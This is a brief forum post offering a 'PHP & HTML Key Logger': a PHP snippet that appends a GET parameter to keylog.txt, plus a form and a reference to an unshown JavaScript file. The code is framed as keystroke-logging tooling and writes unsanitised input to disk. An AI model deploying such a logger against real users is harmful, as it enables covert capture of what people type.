PHP & HTML Key Logger
Page 1 of 1
PHP & HTML Key Logger
- Code:
<?php
ini_set("display_errors", "1");
error_reporting(E_ALL);
$logfile="keylog.txt";
$key=$_GET['key'];
if($key !=""){
$current = file_get_contents($logfile);
$key .=$current;
file_put_contents($logfile, $key);
}
?>
<script src="js/js.js"></script>
<form>
<input name="key" action="GET" type="text">
<input type="submit">
</form>
Last edited by jamied_uk on 13th June 2016, 23:38; edited 1 time in total
Similar topics
» Built in key logger for key logging in msf on linux
» HTML Colour Codes
» copy js css and html from a site with 1 programm
» HTML CSS JS Clickable Grid With An Image
» Web Based HTML Slot Machine TUT
» HTML Colour Codes
» copy js css and html from a site with 1 programm
» HTML CSS JS Clickable Grid With An Image
» Web Based HTML Slot Machine TUT
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum